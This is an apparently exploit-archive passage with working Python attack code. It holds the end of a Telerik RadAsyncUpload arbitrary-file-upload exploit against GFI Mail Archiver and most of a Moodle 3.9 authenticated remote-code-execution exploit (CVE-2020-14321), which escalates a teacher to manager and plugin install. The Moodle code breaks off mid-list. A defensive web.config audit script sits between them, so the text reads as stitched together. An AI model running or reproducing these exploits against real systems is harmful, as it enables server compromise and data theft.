'","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}' partB = \ "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \ Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4" return rauPostData_enc(partA, partB) def payload(TempTargetFolder, Version, payload_filename): sys.stderr.write("Local file path: " + payload_filename + "\n") payload_filebasename = os.path.basename(payload_filename) sys.stderr.write("Destination file name: " + payload_filebasename + "\n") sys.stderr.write("Destination path: " + TempTargetFolder + "\n") sys.stderr.write("Version: " + Version + "\n") sys.stderr.write("Preparing payload... \n") payload_file = open(payload_filename, "rb") payload_file_data = payload_file.read() payload_file.close() data = rauPostData_prep(TempTargetFolder, Version) data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n" data += "Content-Type: application/octet-stream\r\n" data += "\r\n" data += payload_file_data.decode("raw_unicode_escape") + "\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"fileName\"\r\n" data += "\r\n" data += "RAU_crypto.bypass\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"contentType\"\r\n" data += "\r\n" data += "text/html\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n" data += "\r\n" data += "2019-01-02T03:04:05.067Z\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"metadata\"\r\n" data += "\r\n" data += 
"{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \ payload_filebasename + "\"}\r\n" data += "-----------------------------62616f37756f2f--\r\n" data += "\r\n" sys.stderr.write("Payload prep done\n") return data def upload(data, url, proxy = False): global CERT_VERIFY sys.stderr.write("Preparing to send request to " + url + "\n") session = requests.Session() request = requests.Request( "POST", url, data=data ) request = request.prepare() request.headers["Content-Type"] = \ "multipart/form-data; " +\ "boundary=---------------------------62616f37756f2f" response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy)) sys.stderr.write("Request done\n") return response.text def decode_rauPostData(rauPostData): rauPostData = rauPostData.split("&") rauJSON = RAUCipher.decrypt(rauPostData[0]) decoded = "\nJSON: " + rauJSON + "\n" TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"] decoded = decoded + "\nTempTargetFolder = " + \ RAUCipher.decrypt(TempTargetFolder) + "\n" rauVersion = RAUCipher.decrypt(rauPostData[1]) decoded = decoded + "\nVersion: " + rauVersion + "\n" return decoded def mode_decrypt(): # decrypt ciphertext ciphertext = sys.argv[2] print("\n" + RAUCipher.decrypt(ciphertext) + "\n") def mode_Decrypt_rauPostData(): # decrypt rauPostData rauPostData = sys.argv[2] print(decode_rauPostData(rauPostData)) def mode_encrypt(): # encrypt plaintext plaintext = sys.argv[2] print("\n" + RAUCipher.encrypt(plaintext) + "\n") def mode_Encrypt_rauPostData(): # encrypt rauPostData based on TempTargetFolder and Version TempTargetFolder = sys.argv[2] Version = sys.argv[3] print( "rauPostData: " + rauPostData_prep(TempTargetFolder, Version) + "\n" ) def mode_payload(): # generate a payload based on TempTargetFolder, Version and payload file TempTargetFolder = sys.argv[2] Version = "2013.1.417.40" payload_filename = sys.argv[4] print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f") 
print(payload(TempTargetFolder, Version, payload_filename)) def mode_Post(proxy = False): # generate and upload a payload based on # TempTargetFolder, Version, payload file and url Version = "2013.1.417.40" url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau" payload_filename = sys.argv[4] TempTargetFolder = sys.argv[6] print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy)) print("\n[+] Check your uploaded file\n"); def mode_help(): print( "Usage: \nExample1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'") sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n") sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n") if len(sys.argv) < 2: mode_help() elif sys.argv[1] == "-u" and len(sys.argv) == 7: mode_Post() else: mode_help()
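The script above only works when the RadAsyncUpload handler still derives its keys from the two well-known defaults hard-coded in RAUCipher ("PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" and "PrivateKeyForHashOfUploadConfiguration"); with those, anyone can forge a valid rauPostData and pick the destination folder. The first thing a defender should verify, besides applying the vendor updates referenced in the two component advisories above, is that the application's web.config no longer relies on those defaults. The following is an added example, not part of the original post nor of GFI's or Telerik's code: the appSettings names are the ones Telerik documents for overriding the RadAsyncUpload keys, the MIN_KEY_LEN threshold is an assumption, and both web.config fragments are constructed for the example.

```python
# Added example (not from the original post): audit a web.config for the two
# RadAsyncUpload appSettings whose shipped defaults the exploit above relies on.
# The appSettings names follow Telerik's hardening guidance; the sample
# web.config fragments below are constructed for this example.
import xml.etree.ElementTree as ET

# Well-known defaults used by the exploit when no custom key is configured.
DEFAULT_KEYS = {
    "Telerik.AsyncUpload.ConfigurationEncryptionKey":
        "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration",
    "Telerik.Upload.ConfigurationHashKey":
        "PrivateKeyForHashOfUploadConfiguration",
}
MIN_KEY_LEN = 32  # assumption: treat shorter custom keys as too weak


def audit_upload_keys(web_config_xml: str) -> dict:
    """Return {setting_name: finding} for each RadAsyncUpload key.

    finding is "missing" (the default key will be used), "default" (explicitly
    set to the well-known value), "short" (custom but weak) or "ok".
    """
    root = ET.fromstring(web_config_xml)
    settings = {}
    for add in root.iter("add"):
        key = add.get("key")
        if key in DEFAULT_KEYS:
            settings[key] = add.get("value", "")
    findings = {}
    for name, default_value in DEFAULT_KEYS.items():
        if name not in settings:
            findings[name] = "missing"
        elif settings[name] == default_value:
            findings[name] = "default"
        elif len(settings[name]) < MIN_KEY_LEN:
            findings[name] = "short"
        else:
            findings[name] = "ok"
    return findings


def is_exposed(findings: dict) -> bool:
    """True if either key leaves rauPostData forgeable with the public defaults."""
    return any(f in ("missing", "default") for f in findings.values())


# Constructed sample: one key left at the shipped default, the other never set.
WEAK_CONFIG = """<configuration>
  <appSettings>
    <add key="Telerik.AsyncUpload.ConfigurationEncryptionKey"
         value="PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" />
  </appSettings>
</configuration>"""

# Constructed sample: both keys overridden with long values (placeholders, not real keys).
HARDENED_CONFIG = """<configuration>
  <appSettings>
    <add key="Telerik.AsyncUpload.ConfigurationEncryptionKey"
         value="EXAMPLE-REPLACE-WITH-RANDOM-0123456789abcdef0123456789abcdef" />
    <add key="Telerik.Upload.ConfigurationHashKey"
         value="EXAMPLE-REPLACE-WITH-RANDOM-fedcba9876543210fedcba9876543210" />
  </appSettings>
</configuration>"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_upload_keys(cfg)
        print(label, result, "EXPOSED" if is_exposed(result) else "ok")
```

Run it against the real web.config of the Archiver web application; a "missing" or "default" finding means the handler accepts upload configurations built with the keys embedded in the script above, regardless of which PBKDF variant the installed Telerik build uses.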
-
Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 12-05-2021
# Exploit Author: lanz
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.9
# Tested on: FreeBSD

#!/usr/bin/python3

## Moodle 3.9 - RCE (Authenticated as teacher)
## Based on PoC and Payload to assign full permissions to manager rol:
## * https://github.com/HoangKien1020/CVE-2020-14321
## Repository: https://github.com/lanzt/CVE-2020-14321/blob/main/CVE-2020-14321_RCE.py

import os
import string, random
import requests, re
import argparse
import base64
import signal
import time
from pwn import *


class Color:
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'


def def_handler(sig, frame):
    print(Color.RED + "\n[!] 3xIt1ngG...\n")
    exit(1)


signal.signal(signal.SIGINT, def_handler)

banner = base64.b64decode("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").decode()
print(Color.BLUE + banner + Color.END)


def usagemybro():
    fNombre = os.path.basename(__file__)
    ussage = fNombre + ' [-h] [-u USERNAME] [-p PASSWORD] [-idm ID_MANAGER] [-idc ID_COURSE] [-c COMMAND] [--cookie TEACHER_COOKIE] url\n\n'
    ussage += '[+] Examples:\n'
    ussage += '\t' + fNombre + ' http://moodle.site.com/moodle -u teacher_name -p teacher_pass\n'
    ussage += '\t' + fNombre + " http://moodle.site.com/moodle --cookie thisistheffcookieofmyteaaacher\n"
    return ussage


def arguments():
    parse = argparse.ArgumentParser(usage=usagemybro())
    parse.add_argument(dest='url', type=str, help='URL Moodle site')
    parse.add_argument('-u', dest='username', type=str, default='lanz', help='Teacher username, default: lanz')
    parse.add_argument('-p', dest='password', type=str, default='Lanz123$!', help='Teacher password, default: Lanz123$!')
    parse.add_argument('-idm', dest='id_manager', type=str, default='25', help='Manager user ID, default: 25')
    parse.add_argument('-idc', dest='id_course', type=str, default='5', help='Course ID valid to enrol yourself, default: 5')
    parse.add_argument('-c', dest='command', type=str, default='whoami', help='Command to execute, default: whoami')
    parse.add_argument('--cookie', dest='teacher_cookie', type=str, default='', help='Teacher cookie (if you don\'t have valid credentials)')
    return parse.parse_args()


def login(url, username, password, course_id, teacher_cookie):
    ''' Sign in on site, with creds or with cookie '''
    p1 = log.progress("Login on site")
    session = requests.Session()
    r = session.get(url + '/login/index.php')

    # Sign in with teacher cookie
    if teacher_cookie != "":
        p1.status("Cookie " + Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END)
        time.sleep(2)
        # In case the URL format is: http://moodle.site.com/moodle
        cookie_domain = url.split('/')[2]  # moodle.site.com
        cookie_path = "/%s/" % (url.split('/')[3])  # /moodle/
        session.cookies.set('MoodleSession', teacher_cookie, domain=cookie_domain, path=cookie_path)
        r = session.get(url + '/user/index.php', params={"id": course_id})
        try:
            re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0]
        except IndexError:
            p1.failure(Color.RED + "✘" + Color.END)
            print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n")
            exit(1)
        id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0]
        sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]
        p1.success(Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END + Color.YELLOW + " ✓" + Color.END)
        time.sleep(1)

    # Sign in with teacher credentials
    elif username and password != "":
        p1.status("Creds " + Color.BLUE + username + ":" + password + Color.END)
        time.sleep(2)
        login_token = re.findall(r'name="logintoken" value="(.*?)"', r.text)[0]
        data_post = {
            "anchor": "",
            "logintoken": login_token,
            "username": username,
            "password": password
        }
        r = session.post(url + '/login/index.php', data=data_post)
        if "Recently accessed courses" not in r.text:
            p1.failure(Color.RED + "✘" + Color.END)
            print(Color.RED + "\nInvalid credentials.\n")
            exit(1)
        id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0]
        sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]
        p1.success(Color.BLUE + username + ":" + password + Color.END + Color.YELLOW + " ✓" + Color.END)
        time.sleep(1)
    else:
        print(Color.RED + "\nUse valid credentials or valid cookie\n")
        exit(1)

    return session, id_user, sess_key


def enrol2rce(session, url, id_manager, username, course_id, teacher_cookie, command):
    ''' Assign rol manager to teacher and manager account in the course. '''
    p4 = log.progress("Updating roles to move on manager accout")
    time.sleep(1)
    r = session.get(url + '/user/index.php', params={"id": course_id})
    try:
        teacher_user = re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0]
    except IndexError:
        p4.failure(Color.RED + "✘" + Color.END)
        print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n")
        exit(1)
    p4.status("Teacher " + Color.BLUE + teacher_user + Color.END)
    time.sleep(1)
    id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0]
    sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]

    session = update_rol(session, url, sess_key, course_id, id_user)
    session = update_rol(session, url, sess_key, course_id, id_manager)

    data_get = {
        "id": course_id,
        "user": id_manager,
        "sesskey": sess_key
    }
    r = session.get(url + '/course/loginas.php', params=data_get)
    if "You are logged in as" not in r.text:
        p4.failure(Color.RED + "✘" + Color.END)
        print(Color.RED + "\nError trying to move on manager account. Validate credentials (or cookie).\n")
        exit(1)
    p4.success(Color.YELLOW + "✓" + Color.END)
    time.sleep(1)
    sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]

    # Updating rol manager to enable install plugins
    session, sess_key = update_rol_manager(session, url, sess_key)
    # Upload malicious zip file
    zipb64_up(session, url, sess_key, teacher_user, course_id)
    # RCE on system
    moodle_RCE(url, command)


def update_rol(session, url, sess_key, course_id, id_user):
    ''' Updating teacher rol to enable he update other users '''
    data_get = {
        "mform_showmore_main": "0",
        "id": course_id,
        "action": "enrol",
        "enrolid": "10",
        "sesskey": sess_key,
        "_qf__enrol_manual_enrol_users_form": "1",
        "mform_showmore_id_main": "0",
        "userlist[]": id_user,
        "roletoassign": "1",
        "startdate": "4",
        "duration": ""
    }
    r = session.get(url + '/enrol/manual/ajax.php', params=data_get)
    return session


def update_rol_manager(session, url, sess_key):
    ''' Updating rol manager to enable install plugins
        * Extracted from: https://github.com/HoangKien1020/CVE-2020-14321 '''
    p6 = log.progress("Updating rol manager to enable install plugins")
    time.sleep(1)
    data_get = {
        "action": "edit",
        "roleid": "1"
    }
    random_desc = ''.join(random.choice(string.ascii_lowercase) for i in range(15))
    # Headache part :P
    data_post = \
[('sesskey',sess_key),('return','manage'),('resettype','none'),('shortname','manager'),('name',''),('description',random_desc),('archetype','manager'),('contextlevel10','0'),('contextlevel10','1'),('contextlevel30','0'),('contextlevel30','1'),('contextlevel40','0'),('contextlevel40','1'),('contextlevel50','0'),('contextlevel50','1'),('contextlevel70','0'),('contextlevel70','1'),('contextlevel80','0'),('contextlevel80','1'),('allowassign[]',''),('allowassign[]','1'),('allowassign[]','2'),('allowassign[]','3'),('allowassign[]','4'),('allowassign[]','5'),('allowassign[]','6'),('allowassign[]','7'),('allowassign[]','8'),('allowoverride[]',''),('allowoverride[]','1'),('allowoverride[]','2'),('allowoverride[]','3'),('allowoverride[]','4'),('allowoverride[]','5'),('allowoverride[]','6'),('allowoverride[]','7'),('allowoverride[]','8'),('allowswitch[]',''),('allowswitch[]','1'),('allowswitch[]','2'),('allowswitch[]','3'),('allowswitch[]','4'),('allowswitch[]','5'),('allowswitch[]','6'),('allowswitch[]','7'),('allowswitch[]','8'),('allowview[]',''),('allowview[]','1'),('allowview[]','2'),('allowview[]','3'),('allowview[]','4'),('allowview[]','5'),('allowview[]','6'),('allowview[]','7'),('allowview[]','8'),('block/admin_bookmarks:myaddinstance','1'),('block/badges:myaddinstance','1'),('block/calendar_month:myaddinstance','1'),('block/calendar_upcoming:myaddinstance','1'),('block/comments:myaddinstance','1'),('block/course_list:myaddinstance','1'),('block/globalsearch:myaddinstance','1'),('block/glossary_random:myaddinstance','1'),('block/html:myaddinstance','1'),('block/lp:addinstance','1'),('block/lp:myaddinstance','1'),('block/mentees:myaddinstance','1'),('block/mnet_hosts:myaddinstance','1'),('block/myoverview:myaddinstance','1'),('block/myprofile:myaddinstance','1'),('block/navigation:myaddinstance','1'),('block/news_items:myaddinstance','1'),('block/online_users:myaddinstance','1'),('block/private_files:myaddinstance','1'),('block/recentlyaccessedcourses:myaddinstance','1
'),('block/recentlyaccesseditems:myaddinstance','1'),('block/rss_client:myaddinstance','1'),('block/settings:myaddinstance','1'),('block/starredcourses:myaddinstance','1'),('block/tags:myaddinstance','1'),('block/timeline:myaddinstance','1'),('enrol/category:synchronised','1'),('message/airnotifier:managedevice','1'),('moodle/analytics:listowninsights','1'),('moodle/analytics:managemodels','1'),('moodle/badges:manageglobalsettings','1'),('moodle/blog:create','1'),('moodle/blog:manageentries','1'),('moodle/blog:manageexternal','1'),('moodle/blog:search','1'),('moodle/blog:view','1'),('moodle/blog:viewdrafts','1'),('moodle/course:configurecustomfields','1'),('moodle/course:recommendactivity','1'),('moodle/grade:managesharedforms','1'),('moodle/grade:sharegradingforms','1'),('moodle/my:configsyspages','1'),('moodle/my:manageblocks','1'),('moodle/portfolio:export','1'),('moodle/question:config','1'),('moodle/restore:createuser','1'),('moodle/role:manage','1'),('moodle/search:query','1'),('moodle/site:config','1'),('moodle/site:configview','1'),('moodle/site:deleteanymessage','1'),('moodle/site:deleteownmessage','1'),('moodle/site:doclinks','1'),('moodle/site:forcelanguage','1'),('moodle/site:maintenanceaccess','1'),('moodle/site:manageallmessaging','1'),('moodle/site:messageanyuser','1'),('moodle/site:mnetlogintoremote','1'),('moodle/site:readallmessages','1'),('moodle/site:sendmessage','1'),('moodle/site:uploadusers','1'),('moodle/site:viewparticipants','1'),('moodle/tag:edit','1'),('moodle/tag:editblocks','1'),('moodle/tag:flag','1'),('moodle/tag:manage','1'),('moodle/user:changeownpassword','1'),('moodle/user:create','1'),('moodle/user:delete','1'),('moodle/user:editownmessageprofile','1'),('moodle/user:editownprofile','1'),('moodle/user:ignoreuserquota','1'),('moodle/user:manageownblocks','1'),('moodle/user:manageownfiles','1'),('moodle/user:managesyspages','1'),('moodle/user:update','1'),('moodle/webservice:createmobiletoken','1'),('moodle/webservice:createtoken','
1'),('moodle/webservice:managealltokens','1'),('quizaccess/seb:managetemplates','1'),('report/courseoverview:view','1'),('report/performance:view','1'),('report/questioninstances:view','1'),('report/security:view','1'),('report/status:view','1'),('tool/customlang:edit','1'),('tool/customlang:view','1'),('tool/dataprivacy:managedataregistry','1'),('tool/dataprivacy:managedatarequests','1'),('tool/dataprivacy:requestdeleteforotheruser','1'),('tool/lpmigrate:frameworksmigrate','1'),('tool/monitor:managetool','1'),('tool/policy:accept','1'),('tool/policy:managedocs','1'),('tool/policy:viewacceptances','1'),('tool/uploaduser:uploaduserpictures','1'),('tool/usertours:managetours','1'),('auth/oauth2:managelinkedlogins','1'),('moodle/badges:manageownbadges','1'),('moodle/badges:viewotherbadges','1'),('moodle/competency:evidencedelete','1'),('moodle/competency:plancomment','1'),('moodle/competency:plancommentown','1'),('moodle/competency:planmanage','1'),('moodle/competency:planmanagedraft','1'),('moodle/competency:planmanageown','1'),('moodle/competency:planmanageowndraft','1'),('moodle/competency:planrequestreview','1'),('moodle/competency:planrequestreviewown','1'),('moodle/competency:planreview','1'),('moodle/competency:planview','1'),('moodle/competency:planviewdraft','1'),('moodle/competency:planviewown','1'),('moodle/competency:planviewowndraft','1'),('moodle/competency:usercompetencycomment','1'),('moodle/competency:usercompetencycommentown','1'),('moodle/competency:usercompetencyrequestreview','1'),('moodle/competency:usercompetencyrequestreviewown','1'),('moodle/competency:usercompetencyreview','1'),('moodle/competency:usercompetencyview','1'),('moodle/competency:userevidencemanage','1'),('moodle/competency:userevidencemanageown','0'),('moodle/competency:userevidenceview','1'),('moodle/user:editmessageprofile','1'),('moodle/user:editprofile','1'),('moodle/user:manageblocks','1'),('moodle/user:readuserblogs','1'),('moodle/user:readuserposts','1'),('moodle/user:viewa
lldetails','1'),('moodle/user:viewlastip','1'),('moodle/user:viewuseractivitiesreport','1'),('report/usersessions:manageownsessions','1'),('tool/dataprivacy:downloadallrequests','1'),('tool/dataprivacy:downloadownrequest','1'),('tool/dataprivacy:makedatadeletionrequestsforchildren','1'),('tool/dataprivacy:makedatarequestsforchildren','1'),('tool/dataprivacy:requestdelete','1'),('tool/policy:acceptbehalf','1'),('moodle/category:manage','1'),('moodle/category:viewcourselist','1'),('moodle/category:viewhiddencategories','1'),('moodle/cohort:assign','1'),('moodle/cohort:manage','1'),('moodle/competency:competencymanage','1'),('moodle/competency:competencyview','1'),('moodle/competency:templatemanage','1'),('moodle/competency:templateview','1'),('moodle/course:create','1'),('moodle/course:request','1'),('moodle/site:approvecourse','1'),('repository/contentbank:accesscoursecategorycontent','1'),('repository/contentbank:accessgeneralcontent','1'),('block/recent_activity:viewaddupdatemodule','1'),('block/recent_activity:viewdeletemodule','1'),('contenttype/h5p:access','1'),('contenttype/h5p:upload','1'),('contenttype/h5p:useeditor','1'),('enrol/category:config','1'),('enrol/cohort:config','1'),('enrol/cohort:unenrol','1'),('enrol/database:config','1'),('enrol/database:unenrol','1'),('enrol/flatfile:manage','1'),('enrol/flatfile:unenrol','1'),('enrol/guest:config','1'),('enrol/imsenterprise:config','1'),('enrol/ldap:manage','1'),('enrol/lti:config','1'),('enrol/lti:unenrol','1'),('enrol/manual:config','1'),('enrol/manual:enrol','1'),('enrol/manual:manage','1'),('enrol/manual:unenrol','1'),('enrol/manual:unenrolself','1'),('enrol/meta:config','1'),('enrol/meta:selectaslinked','1'),('enrol/meta:unenrol','1'),('enrol/mnet:config','1'),('enrol/paypal:config','1'),('enrol/paypal:manage','1'),('enrol/paypal:unenrol','1'),('enrol/paypal:unenrolself','1'),('enrol/self:config','1'),('enrol/self:holdkey','1'),('enrol/self:manage','1'),('enrol/self:unenrol','1'),('enrol/self:unenrolsel
f','1'),('gradeexport/ods:publish','1'),('gradeexport/ods:view','1'),('gradeexport/txt:publish','1'),('gradeexport/txt:view','1'),('gradeexport/xls:publish','1'),('gradeexport/xls:view','1'),('gradeexport/xml:publish','1'),('gradeexport/xml:view','1'),('gradeimport/csv:view','1'),('gradeimport/direct:view','1'),('gradeimport/xml:publish','1'),('gradeimport/xml:view','1'),('gradereport/grader:view','1'),('gradereport/history:view','1'),('gradereport/outcomes:view','1'),('gradereport/overview:view','1'),('gradereport/singleview:view','1'),('gradereport/user:view','1'),('mod/assign:addinstance','1'),('mod/assignment:addinstance','1'),('mod/book:addinstance','1'),('mod/chat:addinstance','1'),('mod/choice:addinstance','1'),('mod/data:addinstance','1'),('mod/feedback:addinstance','1'),('mod/folder:addinstance','1'),('mod/forum:addinstance','1'),('mod/glossary:addinstance','1'),('mod/h5pactivity:addinstance','1'),('mod/imscp:addinstance','1'),('mod/label:addinstance','1'),('mod/lesson:addinstance','1'),('mod/lti:addcoursetool','1'),('mod/lti:addinstance','1'),('mod/lti:addmanualinstance','1'),('mod/lti:addpreconfiguredinstance','1'),('mod/lti:requesttooladd','1'),('mod/page:addinstance','1'),('mod/quiz:addinstance','1'),('mod/resource:addinstance','1'),('mod/scorm:addinstance','1'),('mod/survey:addinstance','1'),('mod/url:addinstance','1'),('mod/wiki:addinstance','1'),('mod/workshop:addinstance','1'),('moodle/analytics:listinsights','1'),('moodle/backup:anonymise','1'),('moodle/backup:backupcourse','1'),('moodle/backup:backupsection','1'),('moodle/backup:backuptargetimport','1'),('moodle/backup:configure','1'),('moodle/backup:downloadfile','1'),('moodle/backup:userinfo','1'),('moodle/badges:awardbadge','1'),('moodle/badges:configurecriteria','1'),('moodle/badges:configuredetails','1'),('moodle/badges:configuremessages','1'),('moodle/badges:createbadge','1'),('moodle/badges:deletebadge','1'),('moodle/badges:earnbadge','1'),('moodle/badges:revokebadge','1'),('moodle/badges:v
iewawarded','1'),('moodle/badges:viewbadges','1'),('moodle/calendar:manageentries','1'),('moodle/calendar:managegroupentries','1'),('moodle/calendar:manageownentries','1'),('moodle/cohort:view','1'),('moodle/comment:delete','1'),('moodle/comment:post','1'),('moodle/comment:view','1'),('moodle/competency:competencygrade','1'),('moodle/competency:coursecompetencygradable','1'),('moodle/competency:coursecompetencymanage','1'),('moodle/competency:coursecompetencyview','1'),('moodle/contentbank:access','1'),('moodle/contentbank:deleteanycontent','1'),('moodle/contentbank:deleteowncontent','1'),('moodle/contentbank:manageanycontent','1'),('moodle/contentbank:manageowncontent','1'),('moodle/contentbank:upload','1'),('moodle/contentbank:useeditor','1'),('moodle/course:bulkmessaging','1'),('moodle/course:changecategory','1'),('moodle/course:changefullname','1'),('moodle/course:changeidnumber','1'),('moodle/course:changelockedcustomfields','1'),('moodle/course:changeshortname','1'),('moodle/course:changesummary','1'),('moodle/course:creategroupconversations','1'),('moodle/course:delete','1'),('moodle/course:enrolconfig','1'),('moodle/course:enrolreview','1'),('moodle/course:ignorefilesizelimits','1'),('moodle/course:isincompletionreports','1'),('moodle/course:managefiles','1'),('moodle/course:managegroups','1'),('moodle/course:managescales','1'),('moodle/course:markcomplete','1'),('moodle/course:movesections','1'),('moodle/course:overridecompletion','1'),('moodle/course:renameroles','1'),('moodle/course:reset','1'),('moodle/course:reviewotherusers','1'),('moodle/course:sectionvisibility','1'),('moodle/course:setcurrentsection','1'),('moodle/course:setforcedlanguage','1'),('moodle/course:tag','1'),('moodle/course:update','1'),('moodle/course:useremail','1'),('moodle/course:view','1'),('moodle/course:viewhiddencourses','1'),('moodle/course:viewhiddensections','1'),('moodle/course:viewhiddenuserfields','1'),('moodle/course:viewparticipants','1'),('moodle/course:viewscales','1'),
('moodle/course:viewsuspendedusers','1'),('moodle/course:visibility','1'),('moodle/filter:manage','1'),('moodle/grade:edit','1'),('moodle/grade:export','1'),('moodle/grade:hide','1'),('moodle/grade:import','1'),('moodle/grade:lock','1'),('moodle/grade:manage','1'),('moodle/grade:managegradingforms','1'),('moodle/grade:manageletters','1'),('moodle/grade:manageoutcomes','1'),('moodle/grade:unlock','1'),('moodle/grade:view','1'),('moodle/grade:viewall','1'),('moodle/grade:viewhidden','1'),('moodle/notes:manage','1'),('moodle/notes:view','1'),('moodle/question:add','1'),('moodle/question:editall','1'),('moodle/question:editmine','1'),('moodle/question:flag','1'),('moodle/question:managecategory','1'),('moodle/question:moveall','1'),('moodle/question:movemine','1'),('moodle/question:tagall','1'),('moodle/question:tagmine','1'),('moodle/question:useall','1'),('moodle/question:usemine','1'),('moodle/question:viewall','1'),('moodle/question:viewmine','1'),('moodle/rating:rate','1'),('moodle/rating:view','1'),('moodle/rating:viewall','1'),('moodle/rating:viewany','1'),('moodle/restore:configure','1'),('moodle/restore:restoreactivity','1'),('moodle/restore:restorecourse','1'),('moodle/restore:restoresection','1'),('moodle/restore:restoretargetimport','1'),('moodle/restore:rolldates','1'),('moodle/restore:uploadfile','1'),('moodle/restore:userinfo','1'),('moodle/restore:viewautomatedfilearea','1'),('moodle/role:assign','1'),('moodle/role:override','1'),('moodle/role:review','1'),('moodle/role:safeoverride','1'),('moodle/role:switchroles','1'),('moodle/site:viewreports','1'),('moodle/user:loginas','1'),('moodle/user:viewdetails','1'),('moodle/user:viewhiddendetails','1'),('report/completion:view','1'),('report/log:view','1'),('report/log:viewtoday','1'),('report/loglive:view','1'),('report/outline:view','1'),('report/outline:viewuserreport','1'),('report/participation:view','1'),('report/progress:view','1'),('report/stats:view','1'),('repository/contentbank:accesscoursecontent'
,'1'),('tool/monitor:managerules','1'),('tool/monitor:subscribe','1'),('tool/recyclebin:deleteitems','1'),('tool/recyclebin:restoreitems','1'),('tool/recyclebin:viewitems','1'),('webservice/rest:use','1'),('webservice/soap:use','1'),('webservice/xmlrpc:use','1'),('atto/h5p:addembed','1'),('atto/recordrtc:recordaudio','1'),('atto/recordrtc:recordvideo','1'),('booktool/exportimscp:export','1'),('booktool/importhtml:import','1'),('booktool/print:print','1'),('forumreport/summary:view','1'),('forumreport/summary:viewall','1'),('mod/assign:editothersubmission','1'),('mod/assign:exportownsubmission','1'),('mod/assign:grade','1'),('mod/assign:grantextension','1'),('mod/assign:manageallocations','1'),('mod/assign:managegrades','1'),('mod/assign:manageoverrides','1'),('mod/assign:receivegradernotifications','1'),('mod/assign:releasegrades','1'),('mod/assign:revealidentities','1'),('mod/assign:reviewgrades','1'),('mod/assign:showhiddengrader','1'),('mod/assign:submit','1'),('mod/assign:view','1'),('mod/assign:viewblinddetails','1'),('mod/assign:viewgrades','1'),('mod/assignment:exportownsubmission','1'),('mod/assignment:grade','1'),('mod/assignment:submit','1'),('mod/assignment:view','1'),('mod/book:edit','1'),('mod/book:read','1'),('mod/book:viewhiddenchapters','1'),('mod/chat:chat','1'),('mod/chat:deletelog','1'),('mod/chat:exportparticipatedsession','1'),('mod/chat:exportsession','1'),('mod/chat:readlog','1'),('mod/chat:view','1'),('mod/choice:choose','1'),('mod/choice:deleteresponses','1'),('mod/choice:downloadresponses','1'),('mod/choice:readresponses','1'),('mod/choice:view','1'),('mod/data:approve','1'),('mod/data:comment','1'),('mod/data:exportallentries','1'),('mod/data:exportentry','1'),('mod/data:exportownentry','1'),('mod/data:exportuserinfo','1'),('mod/data:managecomments','1'),('mod/data:manageentries','1'),('mod/data:managetemplates','1'),('mod/data:manageuserpresets','1'),('mod/data:rate','1'),('mod/data:view','1'),('mod/data:viewallratings','1'),('mod/data:vi
